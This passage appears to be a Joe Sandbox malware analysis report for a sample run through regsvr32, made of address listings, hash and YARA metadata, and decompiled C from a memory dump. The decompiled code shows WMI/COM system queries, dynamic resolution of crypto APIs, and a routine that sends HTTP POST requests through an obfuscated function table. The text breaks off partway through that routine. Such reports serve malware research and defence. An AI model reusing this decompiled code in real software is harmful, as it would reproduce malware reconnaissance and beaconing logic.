            0x009a83d5
            0x009a83dd
            0x009a83dd
            0x009a83e5
            0x009a83e5
            0x009a83ed
            0x009a83fa
            0x009a8403
            0x009a8408
            0x009a844d
            0x009a844f
            0x009a840a
            0x009a840a
            0x009a840d
            0x009a8410
            0x009a8417
            0x009a841a
            0x009a841d
            0x009a8420
            0x009a8423
            0x009a8429
            0x009a8437
            0x009a843d
            0x009a8446
            0x009a8449
            0x009a8449
            0x009a8452
            0x009a8455
            0x009a845b
            0x009a845b
            0x009a8462
            0x009a8462
            0x009a8469
            0x009a8469
            0x009a8471
            0x009a8471
            0x009a8478
            0x009a8485
            0x009a848e
            0x009a8491
            0x009a8496
            0x009a8498
            0x009a849b
            0x009a84a2
            0x009a84a8
            0x009a84ab
            0x009a84ae
            0x009a84b1
            0x009a84b4
            0x009a84b7
            0x009a84bd
            0x009a84cb
            0x009a84d1
            0x009a84d4
            0x009a84d7
            0x009a84d7
            0x009a84da
            0x009a84dc
            0x009a84df
            0x009a84e5
            0x009a84ec
            0x009a84f2
            0x009a854b
            0x009a854b
            0x00000000
            0x009a84f4
            0x009a84f4
            0x009a84ff
            0x009a8502
            0x009a8505
            0x009a8508
            0x009a850f
            0x009a8512
            0x009a8515
            0x009a8518
            0x009a851b
            0x009a8521
            0x009a852d
            0x009a8532
            0x009a853f
            0x00000000
            0x009a853f
            0x009a8314
            0x009a831a
            0x009a831d
            0x009a8320
            0x009a8320
            0x009a8323
            0x009a8323
            0x009a8329
            0x009a8329
            0x009a8331
            0x009a8336
            0x009a8343
            0x009a834c
            0x009a834f
            0x009a8354
            0x009a839c
            0x009a8356
            0x009a8356
            0x009a8359
            0x009a8360
            0x009a8366
            0x009a8369
            0x009a836c
            0x009a836f
            0x009a8372
            0x009a8375
            0x009a837b
            0x009a8389
            0x009a838c
            0x009a838f
            0x009a8398
            0x009a8398
            0x009a83a2
            0x009a83a8
            0x009a83ab
            0x009a83b2
            0x009a83b2
            0x009a8765
            0x009a8765
            0x009a8768
            0x009a876a
            0x009a876f
            0x009a877e
            0x009a878a
            0x009a878f
            0x009a878f
            0x009a8780
            0x009a8780
            0x009a8785
            0x009a8785
            0x009a8785
            0x009a8771
            0x009a8771
            0x009a8776
            0x009a8776
            0x009a8776
            0x00000000
            0x009a876f
            0x009a830e
            0x009a8303
            0x009a8306
            0x009a8794
            0x00000000
            0x009a8794
            0x00000000
            0x009a8797
            0x009a8797
            0x009a879b
            0x009a879b
            0x009a879b
            0x00000000
            0x009a82e4

            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
            • Instruction ID: 6163e041bb9e3b0573ecf3f66e7416151c96a7dfa0c7204324b043d6b6f4fe4b
            • Opcode Fuzzy Hash: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
            • Instruction Fuzzy Hash: E4F17F755092118FC709CF18C4D88FA7BF5AFA9310B1E86FDD8899B3A6D7319980CB91
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009A63B0 Relevance: .2, Instructions: 190COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 8739f2d7c1acc7a46c4485d5c450b1e549931cc52f7dc0e9a4c145e61ae0c3cb
            • Instruction ID: 67f4084e1e4c56dfd9f5420b20c10569a7976792bc118d3699ce244920000dec
            • Opcode Fuzzy Hash: 8739f2d7c1acc7a46c4485d5c450b1e549931cc52f7dc0e9a4c145e61ae0c3cb
            • Instruction Fuzzy Hash: 147155316241A64FD704CF2EECD047633A1EB8B311745851EEA85CB395C639E92AFBE0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009A29E9 Relevance: .2, Instructions: 169COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 61f11bb46b874e2d381a25acbc75e86c6736a6fab1c11859121ad0a1330ab23a
            • Instruction ID: 18d0a6fe5592e867e94de714990d4f13af5d4bbb00d3e80c99b1bb0a27a9b487
            • Opcode Fuzzy Hash: 61f11bb46b874e2d381a25acbc75e86c6736a6fab1c11859121ad0a1330ab23a
            • Instruction Fuzzy Hash: E8518AB3B041B00BDF688E3E8C642757ED35AD514270EC2B6F8A9CF24AE878C7059760
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009A35EE Relevance: .1, Instructions: 72COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 8c95dcdb1e218d760313f10c37e234220c642911b7c79ac4e28ccc8e6cbbe1be
            • Instruction ID: de5a8e1662bcd296ea54ab30b630598b20250a63dc75b0e138749c094740c11f
            • Opcode Fuzzy Hash: 8c95dcdb1e218d760313f10c37e234220c642911b7c79ac4e28ccc8e6cbbe1be
            • Instruction Fuzzy Hash: BD215E366144129BD35CCF2CD8A6A69F3A5FB89310F85427ED51BCB682CB72E452CBC0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0099EACA Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 50%
            			E0099EACA(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E0099E485(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E00998DC9(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E00998DDF( &_v60, 0xfffffffe);
					E0099E539( &_v104);
					return _t320;
				}
				_t165 = E00999F85(_t255, 0xcdd);
				 *_t328 = 0x6b4;
				_v52 = _t165;
				_t166 = E00999F85(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E00999C50(_t165);
				_v60 = _t322;
				E00998D9A( &_v52);
				E00998D9A( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E00999F85(_t255, 0xc93);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E00998D9A( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E00998DDF( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E00999AB3(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E00999AB3(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E00998E5D(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E00998DC9( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E00998DDF(_t136, 0);
								E00998DDF( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E00999AB3(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E00999F85(_t281, 0xcc1);
								 *_t329 = 0xabe;
								_t217 = E00999F85(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00998DC9(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E00998D9A( &_v92);
											E00998D9A( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E00999FE4();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00998DC9(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E00999F85(_t283, 0x2a);
										E00999FE4( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E00998D9A( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E00999AB3(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E0099E9AE( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E00998DDF( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}





































































            0x0099ead3
            0x0099ead9
            0x0099eae0
            0x0099eae3
            0x0099eae6
            0x0099eaeb
            0x0099eaed
            0x0099eaf2
            0x0099ef37
            0x0099ef37
            0x0099eaff
            0x0099eb01
            0x0099eb04
            0x0099eb07
            0x0099ef1c
            0x0099ef22
            0x0099ef2c
            0x00000000
            0x0099ef31
            0x0099eb12
            0x0099eb19
            0x0099eb20
            0x0099eb23
            0x0099eb28
            0x0099eb2a
            0x0099eb2d
            0x0099eb30
            0x0099eb31
            0x0099eb3a
            0x0099eb40
            0x0099eb43
            0x0099eb4c
            0x0099eb51
            0x0099eb56
            0x0099eb6d
            0x0099eb7a
            0x0099eb7d
            0x0099eb84
            0x0099eb89
            0x0099eb90
            0x0099eb95
            0x0099eb9c
            0x0099eb9e
            0x0099ebaa
            0x0099ebad
            0x0099ebaf
            0x0099ef0c
            0x0099ef0d
            0x0099ef16
            0x00000000
            0x0099ef16
            0x0099ebb5
            0x0099ebb8
            0x0099ebbb
            0x0099ebbe
            0x0099ebc0
            0x0099eed8
            0x0099eedb
            0x0099eede
            0x0099eee0
            0x0099ef02
            0x0099ef07
            0x0099eee2
            0x0099eee5
            0x0099eef0
            0x0099eef7
            0x0099eef7
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0099ebc6
            0x0099ebc6
            0x0099ebd8
            0x0099ebdb
            0x0099ebdd
            0x00000000
            0x00000000
            0x0099ebe5
            0x0099ebe8
            0x0099ebeb
            0x0099ebee
            0x0099ebf1
            0x0099ebf4
            0x00000000
            0x00000000
            0x0099ebfa
            0x0099ec08
            0x0099ec0b
            0x0099ec0d
            0x0099ec26
            0x0099ec35
            0x0099ec3d
            0x0099ec3d
            0x0099ec40
            0x0099ec47
            0x0099ec4b
            0x0099ec51
            0x0099ec53
            0x0099eec0
            0x0099eec6
            0x0099eecc
            0x0099eecf
            0x0099eecf
            0x00000000
            0x0099eecf
            0x0099ec62
            0x0099ec76
            0x0099ec7a
            0x0099ec7c
            0x0099ec81
            0x0099ee8d
            0x0099ee93
            0x0099ee9e
            0x0099eea9
            0x0099eeaf
            0x0099eeb5
            0x0099eeb8
            0x00000000
            0x0099eeb8
            0x0099ec87
            0x0099ee5b
            0x0099ee5b
            0x0099ee5e
            0x0099ee61
            0x00000000
            0x00000000
            0x0099ec8f
            0x0099ec97
            0x0099ec9e
            0x0099eca4
            0x0099eca6
            0x00000000
            0x00000000
            0x0099ecaf
            0x0099ecc4
            0x0099ecca
            0x0099ecd3
            0x0099ecd6
            0x0099ecd9
            0x0099ecdb
            0x0099ee4e
            0x0099ee51
            0x0099ee5a
            0x0099ee5a
            0x00000000
            0x0099ee5a
            0x0099eceb
            0x0099ecee
            0x0099ecf5
            0x0099ecfb
            0x0099ecfe
            0x0099ed01
            0x0099ed04
            0x0099ed07
            0x0099ed43
            0x0099ed43
            0x0099ed46
            0x0099edef
            0x0099ee03
            0x0099ee13
            0x0099ee17
            0x0099ee19
            0x0099ee30
            0x0099ee34
            0x0099ee3d
            0x0099ee48
            0x00000000
            0x0099ee48
            0x0099ee1f
            0x0099ee20
            0x0099ee25
            0x0099ee25
            0x0099ee27
            0x0099ee28
            0x0099ee2d
            0x00000000
            0x0099ee2d
            0x0099ed4c
            0x0099ed4c
            0x0099ed4f
            0x0099edb7
            0x0099edcb
            0x0099eddb
            0x0099eddf
            0x0099ede1
            0x00000000
            0x00000000
            0x0099ede7
            0x0099ede8
            0x00000000
            0x0099ede8
            0x0099ed51
            0x0099ed51
            0x0099ed54
            0x00000000
            0x00000000
            0x0099ed56
            0x0099ed59
            0x00000000
            0x00000000
            0x0099ed5b
            0x0099ed5b
            0x0099ed61
            0x0099ed7a
            0x0099ed89
            0x0099ed92
            0x0099ed97
            0x0099ed9a
            0x0099eda0
            0x0099eda0
            0x0099eda5
            0x0099edb1
            0x00000000
            0x0099edb1
            0x0099ed66
            0x00000000
            0x0099ed66
            0x0099ed09
            0x0099ed30
            0x0099ed35
            0x0099ed3a
            0x0099ed3c
            0x0099ed3c
            0x00000000
            0x0099ed3a
            0x0099ed0b
            0x0099ed0b
            0x0099ed0e
            0x00000000
            0x00000000
            0x0099ed14
            0x0099ed14
            0x0099ed17
            0x00000000
            0x00000000
            0x0099ed1d
            0x0099ed1d
            0x0099ed20
            0x00000000
            0x00000000
            0x0099ed26
            0x0099ed29
            0x00000000
            0x00000000
            0x0099ed2b
            0x00000000
            0x0099ed2b
            0x0099ee6a
            0x0099ee70
            0x0099ee76
            0x0099ee79
            0x0099ee7c
            0x0099ee7c
            0x0099ee7f
            0x0099ee80
            0x0099ee83
            0x0099ee85
            0x00000000
            0x00000000
            0x0099eed5
            0x0099eed5
            0x00000000
            0x0099eed5
            0x0099ec0f
            0x0099ec15
            0x00000000
            0x0099ec15
            0x0099eed2
            0x00000000
            0x0099eb58
            0x0099eb5d
            0x0099eb62
            0x00000000
            0x0099eb66

            APIs
              • Part of subcall function 0099E485: CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,0099E7B4,00000E16,00000000,00000000,00000005), ref: 0099E498
              • Part of subcall function 0099E485: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0099E7B4,00000E16,00000000,00000000,00000005), ref: 0099E4A9
              • Part of subcall function 0099E485: CoCreateInstance.OLE32(009AC8A0,00000000,00000001,009AC8B0,00000000,?,0099E7B4,00000E16,00000000,00000000,00000005), ref: 0099E4C0
              • Part of subcall function 0099E485: SysAllocString.OLEAUT32(00000000), ref: 0099E4CB
              • Part of subcall function 0099E485: CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0099E7B4,00000E16,00000000,00000000,00000005), ref: 0099E4F6
              • Part of subcall function 00998DC9: RtlAllocateHeap.NTDLL(00000008,?,?,00999793,00000100,?,0099661B), ref: 00998DD7
            • SysAllocString.OLEAUT32(00000000), ref: 0099EB73
            • SysAllocString.OLEAUT32(00000000), ref: 0099EB87
            • SysFreeString.OLEAUT32(?), ref: 0099EF0D
            • SysFreeString.OLEAUT32(?), ref: 0099EF16
              • Part of subcall function 00998DDF: HeapFree.KERNEL32(00000000,00000000), ref: 00998E25
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
            • String ID: FALSE$TRUE
            • API String ID: 1290676130-1412513891
            • Opcode ID: 0feb9c066840bc991fd07e48f59d301e1773c1dc61c58ed26b2b407c1e1661d6
            • Instruction ID: dee91dc712e980ffcfece0a8e867b6c7129d8eb4e5b40e062ced844237b2dea3
            • Opcode Fuzzy Hash: 0feb9c066840bc991fd07e48f59d301e1773c1dc61c58ed26b2b407c1e1661d6
            • Instruction Fuzzy Hash: 68E14871E00219AFDF14DFE8C889EAEBBB9FF49300F144559E506AB295DB31AD41CB90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009A2951 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 66libraryloaderCOMMON
            Download Yara Rule
            C-Code - Quality: 30%
            			E009A2951(intOrPtr* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char _v16;
				_Unknown_base(*)()* _t15;
				void* _t20;
				intOrPtr* _t25;
				intOrPtr* _t29;
				struct HINSTANCE__* _t30;

				_v8 = _v8 & 0x00000000;
				_t30 = GetModuleHandleW(L"advapi32.dll");
				if(_t30 == 0) {
					L7:
					return 1;
				}
				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
				if(_t25 == 0) {
					goto L7;
				}
				_t15 = GetProcAddress(_t30, "CryptGenRandom");
				_v12 = _t15;
				if(_t15 == 0) {
					goto L7;
				}
				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
				if(_t29 == 0) {
					goto L7;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if( *_t25() == 0) {
					goto L7;
				}
				_t20 = _v12(_v8, 4,  &_v16);
				 *_t29(_v8, 0);
				if(_t20 == 0) {
					goto L7;
				}
				 *_a4 = E009A28AC( &_v16);
				return 0;
			}











            0x009a2957
            0x009a2969
            0x009a296d
            0x009a29e1
            0x00000000
            0x009a29e3
            0x009a297d
            0x009a2981
            0x00000000
            0x00000000
            0x009a2989
            0x009a298b
            0x009a2990
            0x00000000
            0x00000000
            0x009a299a
            0x009a299e
            0x00000000
            0x00000000
            0x009a29a0
            0x009a29a5
            0x009a29a7
            0x009a29a9
            0x009a29ae
            0x009a29b3
            0x00000000
            0x00000000
            0x009a29be
            0x009a29c8
            0x009a29cc
            0x00000000
            0x00000000
            0x009a29db
            0x00000000

            APIs
            • GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,00000000,00997C84), ref: 009A2963
            • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 009A297B
            • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 009A2989
            • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 009A2998
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: AddressProc$HandleModule
            • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
            • API String ID: 667068680-129414566
            • Opcode ID: f24f45ef940f5f482eb627eea4cf134c8230060967cf4bfd93413664bbcd9e79
            • Instruction ID: c612d1f93ec0fcdda67f95b55a4f9246a507e148dbe68e1a1c8d90d04de777d5
            • Opcode Fuzzy Hash: f24f45ef940f5f482eb627eea4cf134c8230060967cf4bfd93413664bbcd9e79
            • Instruction Fuzzy Hash: 14118232A443197BDB1197BC8D42F9FB6ACAFC6B58F210161FE00EA180DB74DE0086D4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0099F7A3 Relevance: 12.3, APIs: 7, Strings: 1, Instructions: 268COMMON
            Download Yara Rule
            C-Code - Quality: 93%
            			E0099F7A3(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int* _a12, signed int* _a16, signed int* _a20, signed int _a24) {
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				int _v68;
				void* _v72;
				intOrPtr _v92;
				int _v96;
				void* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				char* _v112;
				char _v116;
				char _v132;
				void _v388;
				void _v644;
				intOrPtr _t94;
				intOrPtr _t102;
				signed int _t104;
				intOrPtr* _t105;
				intOrPtr _t110;
				signed int _t111;
				signed int _t112;
				intOrPtr _t115;
				signed int _t116;
				char _t117;
				intOrPtr _t119;
				char _t122;
				intOrPtr _t127;
				signed int _t129;
				intOrPtr _t135;
				intOrPtr _t139;
				intOrPtr _t143;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr _t153;
				intOrPtr _t155;
				intOrPtr _t159;
				void* _t163;
				signed int _t165;
				void* _t166;
				intOrPtr _t179;
				signed int _t186;
				char _t188;
				signed int _t189;
				void* _t190;
				char _t193;
				signed int _t194;
				signed int _t195;
				void* _t196;

				_v24 = 4;
				_v32 = 0;
				_v28 = 1;
				_t190 = __edx;
				memset( &_v388, 0, 0x100);
				memset( &_v644, 0, 0x100);
				_t166 = 0x65;
				_v56 = E00999F6B(_t166);
				_v52 = E00999F6B(0xcc6);
				_v48 = E00999F6B(0xe03);
				_v44 = E00999F6B(0x64c);
				_t94 = E00999F6B(0x80a);
				_v36 = _v36 & 0;
				_t188 = 0x3c;
				_v40 = _t94;
				E00998F63( &_v116, 0, 0x100);
				_v108 = 0x10;
				_v112 =  &_v132;
				_v116 = _t188;
				_v100 =  &_v388;
				_v96 = 0x100;
				_v72 =  &_v644;
				_push( &_v116);
				_push(0);
				_v68 = 0x100;
				_push(E0099A5D0(_t190));
				_t102 =  *0x9af8f0; // 0x0
				_push(_t190);
				if( *((intOrPtr*)(_t102 + 0x28))() != 0) {
					_t104 = 0;
					__eflags = 0;
					_v12 = 0;
					do {
						_t105 =  *0x9af8f0; // 0x0
						_v8 = 0x8404f700;
						_t189 =  *_t105( *0x9af9d8,  *((intOrPtr*)(_t196 + _t104 * 4 - 0x1c)), 0, 0, 0);
						__eflags = _t189;
						if(_t189 != 0) {
							E0099F73B(_t189);
							_t110 =  *0x9af8f0; // 0x0
							_t111 =  *((intOrPtr*)(_t110 + 0x1c))(_t189,  &_v388, _v92, 0, 0, 3, 0, 0);
							__eflags = _a24;
							_t165 = _t111;
							if(_a24 != 0) {
								E0099A1F8(_a24);
							}
							__eflags = _t165;
							if(_t165 != 0) {
								__eflags = _v104 - 4;
								_t112 = 0x8484f700;
								if(_v104 != 4) {
									_t112 = _v8;
								}
								_t115 =  *0x9af8f0; // 0x0
								_t116 =  *((intOrPtr*)(_t115 + 0x20))(_t165, "POST",  &_v644, 0, 0,  &_v56, _t112, 0);
								_v8 = _t116;
								__eflags = _a24;
								if(_a24 != 0) {
									E0099A1F8(_a24);
									_t116 = _v8;
								}
								__eflags = _t116;
								if(_t116 != 0) {
									__eflags = _v104 - 4;
									if(_v104 == 4) {
										E0099F6E9(_t116);
									}
									_t117 = E00999F6B(0x82e);
									_t193 = _t117;
									_v16 = _t193;
									_t119 =  *0x9af8f0; // 0x0
									_t194 = _v8;
									_v8 =  *((intOrPtr*)(_t119 + 0x24))(_t194, _t193, E0099A5D0(_t193), _a4, _a8);
									E00998D87( &_v16);
									__eflags = _a24;
									if(_a24 != 0) {
										E0099A1F8(_a24);
									}
									__eflags = _v8;
									if(_v8 != 0) {
										L25:
										_t122 = 8;
										_v24 = _t122;
										_v20 = 0;
										_v16 = 0;
										E00998F63( &_v20, 0, _t122);
										_t127 =  *0x9af8f0; // 0x0
										__eflags =  *((intOrPtr*)(_t127 + 0xc))(_t194, 0x13,  &_v20,  &_v24, 0);
										if(__eflags != 0) {
											_t129 = E0099A102( &_v20, __eflags);
											__eflags = _t129 - 0xc8;
											if(_t129 == 0xc8) {
												 *_a20 = _t194;
												 *_a12 = _t189;
												 *_a16 = _t165;
												__eflags = 0;
												return 0;
											}
											_v12 =  ~_t129;
											L29:
											_t135 =  *0x9af8f0; // 0x0
											 *((intOrPtr*)(_t135 + 8))(_t194);
											_t195 = _v12;
											L30:
											__eflags = _t165;
											if(_t165 != 0) {
